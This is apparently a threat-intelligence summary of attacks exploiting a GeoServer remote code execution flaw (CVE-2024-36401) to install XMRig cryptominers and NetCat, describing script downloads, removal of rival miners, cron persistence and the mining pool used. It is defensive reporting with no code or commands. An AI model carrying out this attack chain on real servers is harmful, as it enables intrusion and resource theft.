A critical remote code execution vulnerability (CVE-2024-36401) in GeoServer has been actively exploited by threat actors to install CoinMiner malware. The attacks target both Windows and Linux environments with unpatched GeoServer installations. In South Korea, attackers exploited the vulnerability to execute PowerShell commands, installing NetCat for remote access and XMRig for cryptocurrency mining. The attack process involves downloading malicious scripts, terminating competing miners, and establishing persistence through Cron jobs. The threat actors use pool.supportxmr.com for mining Monero coins and can potentially perform additional malicious activities using the installed NetCat.